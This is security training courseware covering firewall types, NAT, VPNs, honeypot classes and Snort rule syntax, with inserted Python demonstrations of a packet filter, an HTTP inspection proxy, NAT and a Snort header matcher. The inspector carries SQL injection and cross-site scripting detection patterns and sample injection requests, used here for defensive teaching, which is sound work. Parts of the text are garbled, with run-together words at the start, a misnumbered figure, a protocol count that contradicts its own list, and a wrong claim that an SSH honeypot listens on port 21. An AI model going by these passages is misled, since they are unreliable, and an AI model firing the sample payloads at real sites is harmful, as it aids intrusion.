firewall.A softwarefirewall intercepts all requests from a networkto the computer to
determineif theyare valid and protects the computer fromattacksandunauthorized
access. It incorporates user-definedcontrols, privacy controls,web filtering, content
filtering, etc., to restrict unsafeapplications from runningon an individualsystem,
Softwarefirewallsuse more resources thanhardwarefirewalls, whichreducesthe speed
of the system.Examples of softwarefirewallsinclude thoseproduced byNorton,
McAfee, andKaspersky.
Advantages:
- Less expensive than hardware firewalls.
- Ideal for personal or home use.
- Easier to configure and reconfigure.
Disadvantages:
- Consumes system resources.
- Difficult to uninstall.
- Not appropriate for environments requiring faster response times.
Figure 12.12: Software Firewall
Firewall Technologies
Firewalls are designed and developed with the help of different firewall services. The technologies used for creating firewall rule sets are:
- Packet Filtering
- Circuit-Level Gateways
- Application-Level Firewall
- Stateful Multilayer Inspection
- Application Proxies
- Virtual Private Network
- Network Address Translation
The table below summarizes the technologies at each OSI layer:

OSI Layer      Firewall Technology
Application    Virtual Private Network (VPN), Application Proxies
Presentation   Virtual Private Network (VPN)
Session        Virtual Private Network (VPN), Circuit-Level Gateways
Transport      Virtual Private Network (VPN), Packet Filtering
Network        Virtual Private Network (VPN), Network Address Translation (NAT), Packet Filtering, Stateful Multilayer Inspection
Data Link      Virtual Private Network (VPN), Packet Filtering
Physical       Not Applicable

Table 12.1: Firewall Technologies
The security levels of these technologies vary according to their efficiency levels. A comparison of these technologies can be made by allowing them to pass through the OSI layers between the hosts. The data passes through the intermediate layers from a higher layer to a lower layer. Each layer adds additional information to the data packets. The lower layer then sends the obtained information through the physical network to the upper layers and then to its destination.
Packet FilteringFirewall
In a packet
filtering
firewall,
each packet
is compared
with a set of criteria before it is
forwarded, Depending on the packetandthe criteria,the firewallcan drop the packetand
transmit it or send a messageto the originator.The rules can includethe source and the
destination the source andthedestination
IP address, portnumber, andthe protocol used.It
worksat the internet layer of the TCP/IP
modelor the networklayer of the OSImodel.Packet
filtering
firewallsfocuson individualpackets,
analyze their headerinformation, anddetermine
whichway theyneedto be directed.Traditionalpacket
filtersmakethisdecisionaccording
to
the following
informationi n a packet:
- Source IP address: Used to check whether the packet is coming from a valid source. The information about the source IP address can be found from the IP header of the packet.
- Destination IP address: Checks if the packet is going to the correct destination and if the destination accepts these types of packets. The information about the destination IP address can be found from the IP header of the packet.
- Source TCP/UDP port: Used to check the source port of the packet.
- Destination TCP/UDP port: Used to monitor the destination port regarding the services to be allowed and the services to be denied.
- TCP flag bits: Used to check whether the packet has SYN, ACK, or other bits set for the connection to be made.
- Protocol in use: Used to check whether the protocol that the packet is carrying should be allowed.
- Direction: Used to check whether the packet is entering or leaving the private network.
- Interface: Used to check whether the packet is coming from an unreliable zone.
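The decision procedure above, as an added example that is not part of the courseware: a stateless packet filter that checks exactly the header fields listed (addresses, ports, protocol, TCP flags, direction, interface) against an ordered rule set with first-match semantics and a default of drop. The rule set, addresses and interface names are constructed for the demonstration.

```python
import ipaddress
from dataclasses import dataclass
from typing import Optional

# Constructed example, not code from the CEH courseware: a minimal stateless
# packet filter. Rules are checked in order; the first match decides, and a
# packet that matches no rule is dropped (default deny).

@dataclass
class Packet:
    src_ip: str
    dst_ip: str
    protocol: str            # "tcp", "udp" or "icmp"
    src_port: Optional[int]  # None for icmp
    dst_port: Optional[int]
    direction: str           # "in" (entering the private network) or "out"
    interface: str           # interface the packet arrived on, e.g. "eth0"
    tcp_flags: frozenset = frozenset()  # e.g. {"SYN"} or {"SYN", "ACK"}

@dataclass
class Rule:
    action: str                        # "forward", "drop" or "reject" (message to originator)
    protocol: str = "any"
    src: str = "0.0.0.0/0"             # CIDR block for the source address
    dst: str = "0.0.0.0/0"             # CIDR block for the destination address
    src_ports: Optional[range] = None  # None = any port
    dst_ports: Optional[range] = None
    direction: str = "any"
    interface: str = "any"
    require_flags: frozenset = frozenset()  # all of these must be set
    forbid_flags: frozenset = frozenset()   # none of these may be set

    def matches(self, pkt: Packet) -> bool:
        if self.protocol != "any" and self.protocol != pkt.protocol:
            return False
        if ipaddress.ip_address(pkt.src_ip) not in ipaddress.ip_network(self.src):
            return False
        if ipaddress.ip_address(pkt.dst_ip) not in ipaddress.ip_network(self.dst):
            return False
        if self.src_ports is not None and (pkt.src_port is None or pkt.src_port not in self.src_ports):
            return False
        if self.dst_ports is not None and (pkt.dst_port is None or pkt.dst_port not in self.dst_ports):
            return False
        if self.direction != "any" and self.direction != pkt.direction:
            return False
        if self.interface != "any" and self.interface != pkt.interface:
            return False
        if not self.require_flags <= pkt.tcp_flags:
            return False
        if self.forbid_flags & pkt.tcp_flags:
            return False
        return True

def filter_packet(rules, pkt):
    """Return the action of the first matching rule; drop if none matches."""
    for rule in rules:
        if rule.matches(pkt):
            return rule.action
    return "drop"

# Constructed rule set: private network 10.0.0.0/8, external interface eth0.
RULES = [
    # Anti-spoofing: a packet claiming a private source address that arrives
    # on the external interface is dropped whatever else it carries.
    Rule(action="drop", src="10.0.0.0/8", direction="in", interface="eth0"),
    # New inbound connections to the web server: only connection setup
    # (SYN without ACK) is accepted here.
    Rule(action="forward", protocol="tcp", dst="10.0.0.80/32", dst_ports=range(80, 81),
         direction="in", interface="eth0",
         require_flags=frozenset({"SYN"}), forbid_flags=frozenset({"ACK"})),
    # Replies from the web server back to external clients (ACK set).
    Rule(action="forward", protocol="tcp", src="10.0.0.80/32", src_ports=range(80, 81),
         direction="out", require_flags=frozenset({"ACK"})),
    # Internal hosts may open outbound TCP connections to anywhere.
    Rule(action="forward", protocol="tcp", src="10.0.0.0/8", direction="out"),
    # Telnet into the private network is refused with a message to the sender.
    Rule(action="reject", protocol="tcp", dst="10.0.0.0/8", dst_ports=range(23, 24), direction="in"),
]

def demo():
    """Run four constructed packets through RULES and return the decisions."""
    inbound_web = Packet("203.0.113.5", "10.0.0.80", "tcp", 51000, 80, "in", "eth0", frozenset({"SYN"}))
    spoofed = Packet("10.0.0.9", "10.0.0.80", "tcp", 51000, 80, "in", "eth0", frozenset({"SYN"}))
    telnet = Packet("203.0.113.5", "10.0.0.22", "tcp", 51001, 23, "in", "eth0", frozenset({"SYN"}))
    ping = Packet("203.0.113.5", "10.0.0.80", "icmp", None, None, "in", "eth0")
    return [filter_packet(RULES, p) for p in (inbound_web, spoofed, telnet, ping)]
```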
Figure 12.13: Example of Packet Filtering Firewall
Circuit-Level Gateway Firewall
A circuit-level gateway firewall works at the session layer of the OSI model or the transport layer of TCP/IP. It forwards data between networks without verification and blocks incoming packets from the host but allows the traffic to pass through itself. Information passed to remote computers through a circuit-level gateway will appear to have originated from the gateway, as the incoming traffic carries the IP address of the proxy (circuit-level gateway). Such firewalls monitor requests to create sessions and determine if those sessions will be allowed.
Figure 12.14: Example of Circuit-Level Gateway Firewall
Application-Level Firewall
Application-based proxy firewalls focus on the application layer rather than just the packets. Application-level gateways (proxies) can filter packets at the application layer of the OSI model (or the application layer of TCP/IP). Incoming and outgoing traffic is restricted to services supported by the proxy; all other service requests are denied. The need for an application-level firewall arises from the tremendous amount of voice, video, and collaborative traffic in the data-link layer and network layer, which may be used for unauthorized access to internal and external networks. Application-level gateways configured as web proxies prohibit FTP, gopher, telnet, or other traffic. They examine traffic and filter application-specific commands, such as HTTP post and get, inside of packets.
Some of the features of application-level firewalls are as follows:
- They analyze the application information to make decisions as to whether to permit traffic.
- Being proxy-based, they can permit or deny traffic according to the authenticity of the user or process involved.
- A content-caching proxy optimizes performance by caching frequently accessed information rather than sending new requests to the servers for the same old data.
Application-layer firewalls can function in one of two modes: active or passive.
- Active application-level firewalls: They examine all incoming requests, including the actual message that is exchanged, against known vulnerabilities, such as SQL injection, parameter and cookie tampering, and cross-site scripting. The requests that are deemed genuine are allowed to pass through them.
- Passive application-level firewalls: They work similarly to IDS in that they also check all incoming requests against known vulnerabilities, but they do not actively reject or deny those requests if a potential attack is discovered.
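An added example (not code from the courseware or from any product) of the application-level inspection described above: the request is parsed as HTTP rather than as packets, restricted to the commands the proxy supports, its parameters, cookies and body are checked against indicative patterns for the vulnerability classes named, and the result is either blocked (active mode) or only reported (passive mode). The sample requests, host name and patterns are constructed for the demonstration.

```python
import re
from urllib.parse import unquote_plus

# Constructed example, not code from the CEH courseware: application-level
# inspection of one HTTP request, in active (blocking) or passive (report-only) mode.

ALLOWED_METHODS = {"GET", "POST"}

# Indicative patterns only; a real product uses far richer signatures and
# normalisation. They serve to show where the inspection hooks in.
SIGNATURES = {
    "sql_injection": re.compile(r"('\s*(or|and)\s+\S+\s*=\s*\S+)|(union\s+select)|(--\s*$)", re.I),
    "cross_site_scripting": re.compile(r"<\s*script|javascript:|\bon\w+\s*=", re.I),
}

def parse_request(raw: str):
    """Split a raw HTTP/1.1 request into method, target, headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body

def inspect_request(raw: str, mode: str = "active"):
    """Return (decision, findings); decision is 'allow' or 'block'."""
    method, target, headers, body = parse_request(raw)
    findings = []
    if method not in ALLOWED_METHODS:
        findings.append(f"method {method} not supported by proxy")
    # The query string, cookies and POST body carry the parameters and cookies
    # that injection and tampering attacks target, so each is inspected.
    _, _, query = target.partition("?")
    surfaces = {"query": unquote_plus(query),
                "cookie": headers.get("cookie", ""),
                "body": unquote_plus(body)}
    for where, text in surfaces.items():
        for name, pattern in SIGNATURES.items():
            if pattern.search(text):
                findings.append(f"{name} in {where}")
    if findings and mode == "active":
        return "block", findings   # active: deny the request outright
    return "allow", findings       # passive: pass it on, report like an IDS

# Constructed sample requests for the demonstration.
BENIGN = ("GET /search?q=firewall+types HTTP/1.1\r\nHost: www.example.com\r\n"
          "Cookie: session=abc123\r\n\r\n")
INJECTION = ("POST /login HTTP/1.1\r\nHost: www.example.com\r\n"
             "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
             "user=admin%27+OR+1%3D1--&pass=x")
XSS_COOKIE = ("GET /profile HTTP/1.1\r\nHost: www.example.com\r\n"
              "Cookie: name=<script>alert(1)</script>\r\n\r\n")
UNSUPPORTED = "DELETE /profile HTTP/1.1\r\nHost: www.example.com\r\n\r\n"
```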
Figure 12.5: Example of Application-Level Firewall
Stateful Multilayer Inspection Firewall
Stateful multilayer inspection firewalls combine the aspects of the other three types of firewalls (Packet Filtering, Circuit-Level Gateways, and Application-Level Firewalls). They filter packets at the network layer of the OSI model (or the internet layer of TCP/IP) to determine whether session packets are legitimate, and they evaluate the contents of packets at the application layer.

Figure 12.16: Example of Stateful Multilayer Inspection Firewall
Application Proxy
An application-level proxy works as a proxy server and filters connections for specific services. It filters connections based on the services and protocols when acting as a proxy. For example, an FTP proxy will only allow FTP traffic to pass through, and all other services and protocols will be blocked.
- Proxy services reduce the load on network links as they are capable of caching copies of frequently requested data and allow it to be directly loaded from the system instead of the network.
- Proxy systems automatically perform user-level authentication, as they are involved in the connection.
Network Address Translation (NAT)
Network address translation (NAT) separates IP addresses into two sets and enables the LAN to use these addresses for internal and external traffic. The NAT helps hide an internal network layout and force connections to go through a choke point. It also works with a router, and similarly to packet filtering, it will also modify the packets that the router sends simultaneously. When the internal machine forwards the packet to the external machine, the NAT modifies the source address of the packet to make it appear as if it is coming from a valid address. When the external machine sends the packet to the internal machine, the NAT modifies the destination address to turn the visible address into the correct internal address. The NAT can also change the source and destination port numbers. It limits the number of public IP addresses that an organization can use. It can act as a firewall filtering technique whereby it allows only those connections that originate in the internal network and blocks the connections that originate in the external network.
NAT systems use different schemes for translation between internal and external addresses:
- Assign one external host address for each internal address and always apply the same translation. This slows down connections and does not provide any savings in address space.
- Dynamically allocate an external host address without modifying the port numbers when the internal host initiates a connection. This restricts the number of internal hosts that can simultaneously access the Internet to the number of available external addresses.
- Create a fixed mapping from internal addresses to externally visible addresses but use port mapping so that multiple internal machines use the same external address.
- Dynamically allocate an external host address and port pair each time an internal host initiates a connection. This makes the most efficient possible use of the external host addresses.
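The last scheme, as an added example that is not part of the courseware: a translation table that hands each outbound connection a fresh (external address, port) pair, rewrites replies back to the internal host, and drops inbound packets that do not correspond to a connection the inside started. Addresses and the port pool are constructed for the demonstration.

```python
import itertools

# Constructed example, not code from the CEH courseware: a NAT table that
# allocates an (external address, port) pair per outbound connection.

class NAT:
    def __init__(self, external_addrs, first_port=40000, last_port=40005):
        # Pool of (external address, port) pairs handed out in order. A real
        # router also expires idle translations, which is the "how long to
        # keep a translation" problem noted among the disadvantages.
        self.pool = itertools.product(list(external_addrs), range(first_port, last_port + 1))
        self.outbound = {}  # (int_ip, int_port, dst_ip, dst_port) -> (ext_ip, ext_port)
        self.inbound = {}   # (ext_ip, ext_port, peer_ip, peer_port) -> (int_ip, int_port)

    def translate_outbound(self, pkt):
        """Rewrite the source of a packet leaving the internal network."""
        key = (pkt["src_ip"], pkt["src_port"], pkt["dst_ip"], pkt["dst_port"])
        if key not in self.outbound:
            try:
                ext_ip, ext_port = next(self.pool)
            except StopIteration:
                return None  # no external address/port pair left: drop
            self.outbound[key] = (ext_ip, ext_port)
            self.inbound[(ext_ip, ext_port, pkt["dst_ip"], pkt["dst_port"])] = (pkt["src_ip"], pkt["src_port"])
        ext_ip, ext_port = self.outbound[key]
        return {**pkt, "src_ip": ext_ip, "src_port": ext_port}

    def translate_inbound(self, pkt):
        """Rewrite the destination of a packet arriving from outside, or drop it."""
        key = (pkt["dst_ip"], pkt["dst_port"], pkt["src_ip"], pkt["src_port"])
        if key not in self.inbound:
            return None  # not part of a connection initiated from the inside
        int_ip, int_port = self.inbound[key]
        return {**pkt, "dst_ip": int_ip, "dst_port": int_port}

def demo():
    """Two internal hosts share one public address; only the reply gets back in."""
    nat = NAT(["198.51.100.1"])
    # Both internal hosts happen to use the same source port, which is why
    # the port must be translated as well as the address.
    out1 = nat.translate_outbound({"src_ip": "10.0.0.5", "src_port": 51000,
                                   "dst_ip": "203.0.113.80", "dst_port": 443})
    out2 = nat.translate_outbound({"src_ip": "10.0.0.6", "src_port": 51000,
                                   "dst_ip": "203.0.113.80", "dst_port": 443})
    reply = nat.translate_inbound({"src_ip": "203.0.113.80", "src_port": 443,
                                   "dst_ip": out1["src_ip"], "dst_port": out1["src_port"]})
    unsolicited = nat.translate_inbound({"src_ip": "203.0.113.7", "src_port": 4444,
                                         "dst_ip": "198.51.100.1", "dst_port": 40000})
    return out1, out2, reply, unsolicited
```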
Advantages
- Network address translation helps to enforce the firewall's control over outbound connections.
- It restricts incoming traffic and allows only packets that are part of a current interaction initiated from the inside.
- It helps hide the internal network's configuration and thus lowers the success rate of attacks on the network or system.
Disadvantages
- The NAT system has to guess how long it should keep a particular translation, which is not always possible.
- The NAT interferes with encryption and authentication systems to ensure the security of the data.
- Dynamic allocation of ports may interfere with packet filtering.
Virtual Private Network
A virtual private network (VPN) is a network that provides secure access to the private network through the Internet. VPNs are used for connecting wide area networks (WAN). They allow computers on one network to connect to computers on another network. They are used for the secure transmission of sensitive information over an untrusted network via encapsulation and encryption. They employ encryption and integrity protection, enabling you to use a public network as a private network. A VPN performs encryption and decryption outside the packet filtering perimeter to allow the inspection of packets coming from other sites. It establishes a virtual point-to-point connection through the use of dedicated connections. A VPN also encapsulates packets sent over the Internet. It combines the advantages of both public and private networks. VPNs have no relation to firewall technology, but firewalls are convenient for adding VPN features as they help in providing secure remote access services. Only the computing device running the VPN software can access the VPN. All VPNs that run over the Internet adopt the following principles:
- Encrypts the traffic
- Checks integrity for protection
- Encapsulates new packets, which are sent across the Internet to some destination that reverses the encapsulation
- Checks the integrity
- Decrypts the traffic eventually
Advantages
- A VPN hides all the traffic that flows over it, ensures encryption, and protects data from snooping.
- It provides remote access for protocols while avoiding attackers from the Internet at large.
Disadvantages
- As the VPN runs on a public network, the user will be vulnerable to an attack on the destination network.
Firewall Limitations
Although firewalls are essential to your security strategy, they have the following limitations:
- Firewalls can restrict users from accessing valuable services such as FTP, Telnet, NIS, etc., and they sometimes restrict Internet access as well.
- The firewall cannot prevent internal attacks (backdoor) in a network, e.g., a disgruntled employee who cooperates with the external attacker.
- The firewall focuses its security at a single point, which makes other systems within the network prone to security attacks.
- A bottleneck could occur if all the connections pass through the firewall.
- The firewall cannot protect the network from social engineering and data-driven attacks whereby the attacker sends malicious links and emails to employees inside the network.
- If external devices such as laptops, mobile phones, portable hard drives, etc., are already infected and connected to the network, then a firewall cannot protect the network from these devices.
- The firewall is unable to adequately protect the network from all types of zero-day viruses that try to bypass it.
- A firewall cannot do anything if the network design and configuration is faulty.
- A firewall is not an alternative to antivirus or antimalware tools.
- A firewall does not block attacks from a higher level of the protocol stack.
- A firewall does not prevent attacks originating from common ports and applications.
- A firewall does not prevent attacks from dial-in connections.
- A firewall is unable to understand tunneled traffic.
Honeypot
A honeypot is a computer system on the Internet intended to attract and trap those who attempt unauthorized or illicit utilization of the host system to penetrate an organization's network. It is a fake proxy run to frame attackers by logging traffic through it and then sending complaints to the victims' ISPs. It has no authorized activity or production value, and any traffic to it is likely a probe, attack, or compromise. Whenever there is any interaction with a honeypot, it is most likely to be malicious. Honeypots are unique; they do not solve a specific problem. Instead, they are highly flexible tools with many different security applications. Honeypots help in preventing attacks, detecting attacks, and information gathering and research. A honeypot can log port access attempts or monitor an attacker's keystrokes; these could be early warnings of a more concerted attack. It requires a considerable amount of effort to maintain a honeypot.

Figure 12.17: Example of Honeypot
Types of Honeypots
Honeypots are classified into the following types based on their design criteria:
- Low-interaction Honeypots
Low-interaction honeypots emulate only a limited number of services and applications of a target system or network. If the attacker does something that the emulation does not expect, the honeypot will simply generate an error. They capture limited amounts of information, i.e., mainly transactional data, and some limited interactions. These honeypots cannot be compromised completely. They are set to collect higher-level information about attack vectors such as network probes and worm activities. Some examples are KFSensor, Specter, and Honeytrap.
KFSensor is a low-interaction honeypot used to attract and identify penetrations. It implements vulnerable system services and Trojans to attract hackers. This honeypot can be used to monitor all TCP, UDP, and ICMP ports and services. KFSensor identifies and raises alerts about port scanning and DoS attacks.
A honeytrap is a low-interaction honeypot used to observe attacks against TCP and UDP services. It runs as a daemon and starts server processes dynamically on requested ports. Attackers are tricked into sending responses to the honeytrap server process. The data that is received by the honeypot is concatenated into a string and stored in a database file. This string is called the attack string. Honeytraps parse attack strings for a command requesting the server to download a file from another host in the network. If such a command is detected, the server tries to access the corresponding file automatically. It supports only FTP and TFTP protocols. It also identifies and logs HTTP URIs.
- Medium-interaction Honeypots
Medium-interaction honeypots simulate a real OS as well as applications and services of a target network. They provide greater misconception of an OS than low-interaction honeypots. Therefore, it is possible to log and analyze more complex attacks. These honeypots capture more useful data than low-interaction honeypots. They can only respond to preconfigured commands; therefore, the risk of intrusion increases. The main disadvantage of medium-interaction honeypots is that the attacker can quickly discover that the system behavior is abnormal. Some examples of medium-interaction honeypots include HoneyPy, Kojoney2, and Cowrie.
Kojoney2 is a medium-interaction honeypot that emulates a real SSH environment. This honeypot listens on port 21 for incoming SSH connections. If a connection request is initiated, Kojoney2 will verify users against an internal list of fake users. Usually, the connections are accepted by granting access to the SSH shell. It simulates many shell commands to trick attackers. Using Kojoney2, attackers can download files using wget and curl commands.
- High-Interaction Honeypots
Unlike their low- and medium-interaction counterparts, high-interaction honeypots do not emulate anything; they run actual vulnerable services or software on production systems with real OS and applications. These honeypots simulate all services and applications of a target network. They can be completely compromised by attackers to gain full access to the system in a controlled area. They capture complete information about an attack vector such as attack techniques, tools, and intent. The honeypotized system is more prone to infection, as attack attempts can be carried out on real production systems.
A honeynet is a prime example of a high-interaction honeypot. It is neither a product nor a software solution that a user installs. Instead, it is an architecture: an entire network of computers designed to be attacked. The idea is to have an architecture that creates a highly controlled network with real computers running real applications, in which all activities are monitored and logged. "Bad guys" find, attack, and break into these systems through their own initiative. When they do, they do not realize that they are in a honeynet. Without the knowledge of the attackers, all their activities and actions, from encrypted SSH sessions to email and file uploads, are captured by inserting kernel modules into their systems. At the same time, the honeynet controls the attacker's activity. Honeynets do this by using a honeywall gateway, which allows inbound traffic to the victim's systems but controls the outbound traffic using intrusion prevention technologies. This gives the attacker the flexibility to interact with the victim's systems but prevents the attacker from harming other non-honeynet computers.
- Pure Honeypots
Pure honeypots emulate the real production network of a target organization. They cause attackers to devote their time and resources toward attacking the critical production system of the company. Attackers uncover and discover the vulnerabilities and trigger alerts that help network administrators to provide early warnings of attacks and hence reduce the risk of an intrusion.
Honeypots are classified into the following types based on their deployment strategy:
- Production Honeypots
Production honeypots are deployed inside the production network of the organization along with other production servers. Although such honeypots improve the overall state of security of the organization, they effectively capture only a limited amount of information related to the adversaries. Such honeypots fall under the low-interaction honeypot category and are extensively employed by large organizations and corporations. As production honeypots are deployed internally, they also help to find out internal flaws and attackers within an organization.
- Research Honeypots
Research honeypots are high-interaction honeypots primarily deployed by research institutes, governments, or military organizations to gain detailed knowledge about the actions of intruders. By using such honeypots, security analysts can obtain in-depth information about how an attack is performed, vulnerabilities are exploited, and attack techniques and methods are used by the attackers. This analysis, in turn, can help an organization to improve attack prevention, detection, and security mechanisms and develop a more secure network infrastructure.
The main drawback of research honeypots is that they do not contribute to the direct security of the company. If a company is looking to improve its production infrastructure, it should opt for production honeypots.
Honeypots are classified into the following types based on their deception technology:
- Malware Honeypots
Malware honeypots are used to trap malware campaigns or malware attempts over the network infrastructure. These honeypots are simulated with known vulnerabilities such as outdated APIs, vulnerable SMBv1 protocols, etc., and they also emulate different Trojans, viruses, and backdoors that encourage adversaries to perform exploitation activities. These honeypots lure the attacker or malware into performing attacks, from which the attack pattern, malware signatures, and malware threat actors can be identified effectively.
- Database Honeypots
Database honeypots employ fake databases that are vulnerable to perform database-related attacks such as SQL injection and database enumeration. These fake databases trick the attackers by making them think that these databases contain crucial sensitive information such as credit card details of all the customers and employee databases. However, all the information present in the database is fake and simulated. Such databases lure the attacker to perform attacks with their vulnerabilities; from the attacks, the attack pattern and the threat actor's TTPs towards database attacks can be identified effectively.
- Spam Honeypots
Spam honeypots specifically target spammers who abuse vulnerable resources such as open mail relays and open proxies. Basically, spam honeypots consist of mail servers that deliberately accept emails from any random source from the Internet. They provide crucial information about spammers and their activities.
- Email Honeypots
Email honeypots are also called email traps. They are nothing but fake email addresses that are specifically used to attract fake and malicious emails from adversaries. These fake email IDs will be distributed across the open Internet and dark web to lure threat actors into performing various malicious activities to exploit the organization. By constantly monitoring the incoming emails, the adversary's deception techniques can be identified by the administrators, and internal employees can be warned to avoid falling into such email traps.
- Spider Honeypots
Spider honeypots are also called spider traps. These honeypots are specifically designed to trap web crawlers and spiders. Many threat actors perform web crawling and spidering to extract important information from web applications. Such crucial information includes URLs, contact details, directory details, etc. Spider honeypots are employed to trap such adversaries. A fake website will be emulated and presented as a legitimate one. Threat actors attempting to perform web crawling on such traps will be identified and blacklisted.
- Honeynets
Honeynets are networks of honeypots. They are very effective in determining the entire capabilities of the adversaries. Honeynets are mostly deployed in an isolated virtual environment along with a combination of vulnerable servers. The various TTPs employed by different attackers to enumerate and exploit networks will be recorded, and this information can be very effective in determining the complete capabilities of the adversary.
Module Flow
IDS, IPS, Firewall, and Honeypot Solutions
The previous section discussed the function, role, and placement of IDS, IPS, firewalls, and honeypots for securing networks. A number of easy-to-use and feature-enriched solutions (hardware, software, or both) are available for the implementation of IDS, IPS, firewalls, and honeypots. This section discusses some commercially available solutions that simplify the usage of IDS, IPS, firewalls, and honeypots.
Intrusion Detection Tools: Snort

Snort Rules
- Snort rules help in differentiating between normal and malicious activities.
- Snort rules must be contained on a single line, as the Snort rule parser does not handle rules on multiple lines.
- Snort rules come with two logical parts: the rule header and the rule options.

Snort Rules: Rule Actions and IP Protocols
- The rule action tells Snort what to do when it finds a packet that matches the rule criteria.
- There are three available IP protocols that Snort supports.

Snort Rules: The Direction Operator and IP Addresses
- The direction operator indicates the direction of interest for the traffic; traffic can flow in either a single direction or bidirectionally.
- IP addresses: use the keyword "any" to define any IP address the rule applies to, or use numeric IP addresses qualified with a CIDR netmask.

Snort Rules: Port Numbers
- Port numbers can be listed in different ways, including "any" ports, static port definitions, port ranges, and by negation.
- Port ranges are indicated with the range operator ":".

Intrusion Detection Tools: Suricata and AlienVault® OSSIM™
- Suricata: real-time intrusion detection (IDS), intrusion prevention (IPS), and network security monitoring (NSM).
Intrusion Detection Tools
Intrusion detection tools detect anomalies. These tools, when running on a dedicated workstation, read all network packets, reconstruct user sessions, and scan for possible intrusions by looking for attack signatures and network traffic statistical anomalies. Moreover, these tools offer real-time, zero-day protection from network attacks and malicious traffic, and they prevent malware, spyware, port scans, viruses, DoS, and DDoS from compromising hosts.
Snort
Source: https://www.snort.org
Snort is an open-source network intrusion detection system capable of performing real-time traffic analysis and packet logging on IP networks. It can perform protocol analysis and content searching/matching, and it is used to detect a variety of attacks and probes, such as buffer overflows, stealth port scans, CGI attacks, SMB probes, and OS fingerprinting attempts. It uses a flexible rules language to describe traffic that it should collect or pass, as well as a detection engine that uses a modular plug-in architecture.
Uses of Snort:
- Straight packet sniffer such as tcpdump
- Packet logger (useful for network traffic debugging, etc.)
- Network intrusion prevention system

Figure 12.18: Screenshot of Snort
Snort Rules

Figure 12.19: Snort output

Snort rules, written for both protocol analysis and content searching and matching, should be robust and flexible. The rules should be "robust": the system should maintain a hard check on the activities taking place on the network and notify the administrator of any potential intrusion attempt. The rules should be "flexible": the system must be sufficiently compatible to act immediately and take necessary remedial measures according to the nature of the intrusion.
Both flexibility and robustness can be achieved using an easy-to-understand and lightweight rule-description language that aids in writing simple Snort rules. Consider the following two primary principles while writing Snort rules:

- No written rule should extend beyond a single line; thus, rules should be short, precise, and easy to understand. (Snort versions before 1.8 required this; current versions also accept a backslash "\" at the end of a line to continue a rule on the next line.)
- Each rule should be divided into two logical sections:
  * The rule header
  * The rule options

The rule header contains the rule's action, the protocol, the source and destination IP addresses, the source and destination port information, and the Classless Inter-Domain Routing (CIDR) block. The rule option section includes alert messages in addition to information about the inspected part of the packet, which determines whether to take any rule action.

Figure 12.20: Example of Snort rules
Snort Rules: Rule Actions and IP Protocols

The rule header stores a complete set of criteria to identify a packet and determines the action to be performed or rule to be applied. It contains the information that defines the who, where, and what of a packet, as well as what to do if a packet with all the attributes indicated in the rule should show up. The first item in a rule is the rule action, which tells Snort "what to do" when it finds a packet that matches the rule criteria. There are five available default actions in Snort: alert, log, pass, activate, and dynamic. Furthermore, if Snort is running in inline mode, you have additional options, which include drop, reject, and sdrop (drop without logging).

IP sends data from one system to another via the Internet. It supports unique addressing for every computer on a network. Data on an IP network is organized into packets; each packet contains message data, a source, a destination, and more.

The second field of the rule header is the protocol. Snort analyzes four protocols and accepts the following protocol keywords in a rule:

- tcp: The Transmission Control Protocol (TCP) runs on top of IP. It is used to connect two different hosts and exchange data between them.
- udp: The User Datagram Protocol (UDP) is used for connectionless datagram traffic, for example for broadcasting messages over a network.
- icmp: The Internet Control Message Protocol (ICMP) runs on top of IP. The OS uses ICMP in a network to send error messages, for example when a destination is unreachable.
- ip: Matches any IP protocol, for rules that should apply regardless of the transport protocol.
Snort Rules: Direction Operator and IP Addresses

Direction Operator

This operator indicates the direction of interest for the traffic; traffic can flow either in a single direction ("->", from the source side of the rule to the destination side) or bidirectionally ("<>"). There is no "<-" operator.

Example of a Snort rule using the bidirectional operator:

log tcp !192.168.1.0/24 any <> 192.168.1.0/24 23

IP Addresses

Identify the IP address and port that the rule applies to:

- Use the keyword "any" to define any IP address
- Use numeric IP addresses qualified with a CIDR netmask
- Use the negation operator "!" to match any address except the one specified

Example of IP address negation in a rule:

alert tcp !192.168.1.0/24 any -> 192.168.1.0/24 111 (content: "|00 01 86 a5|"; msg: "external mountd access";)

This rule alerts on TCP traffic from any source outside 192.168.1.0/24 to port 111 (the RPC portmapper) inside that network when the payload contains the bytes 00 01 86 a5, the RPC program number of mountd.

Snort Rules: Port Numbers
Port numbers can be listed in different ways, including the use of "any" ports, static port definitions, port ranges, and negation. Port ranges are indicated with the range operator ":"; a range with no lower bound (":5000") or no upper bound ("400:") is open-ended. The negation operator "!" inverts a port or address specification, so a rule can, for example, raise an alert on any traffic that originated outside the local network.

Example of a port negation:

log tcp any any -> 192.168.1.0/24 !6000:6010

Table 12.2: Examples of port specifications

Rule                                            Meaning
log udp any any -> 192.168.1.0/24 1:1024        Log UDP traffic coming from any port with destination ports ranging from 1 to 1024
log tcp any any -> 192.168.1.0/24 :5000         Log TCP traffic from any port going to ports less than or equal to 5000
log tcp any :1024 -> 192.168.1.0/24 400:        Log TCP traffic coming from the well-known ports (less than or equal to 1024) going to ports greater than or equal to 400
log tcp any any -> 192.168.1.0/24 !6000:6010    Log everything except traffic to ports 6000 through 6010
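The header notations above (rule actions and protocol keywords, "any", CIDR addresses, the "!" negation, the ":" range operator, and the "->" / "<>" direction operators) can be checked against sample 5-tuples with the matcher below. It is an added example written for this page, not Snort's own parser: it handles only the rule header, skips everything inside the option parentheses, and the addresses and ports in the sample calls are constructed.

```python
"""Snort rule-header matcher: action, protocol, addresses, ports, direction.

Added example (not Snort's code). Only the rule HEADER is parsed; the option
section after '(' is ignored. Sample rules are the ones discussed in the text."""
import ipaddress
from dataclasses import dataclass
from typing import Callable

ACTIONS = {"alert", "log", "pass", "activate", "dynamic", "drop", "reject", "sdrop"}
PROTOCOLS = {"tcp", "udp", "icmp", "ip"}


def parse_ports(spec: str) -> Callable[[int], bool]:
    """'any', '80', '1:1024', ':5000', '400:' and a leading '!' for negation."""
    negate = spec.startswith("!")
    spec = spec[1:] if negate else spec
    if spec == "any":
        low, high = 0, 65535
    elif ":" in spec:
        a, b = spec.split(":", 1)
        low = int(a) if a else 0          # ':5000' -> 0..5000
        high = int(b) if b else 65535     # '400:'  -> 400..65535
    else:
        low = high = int(spec)
    return lambda port: (low <= port <= high) != negate


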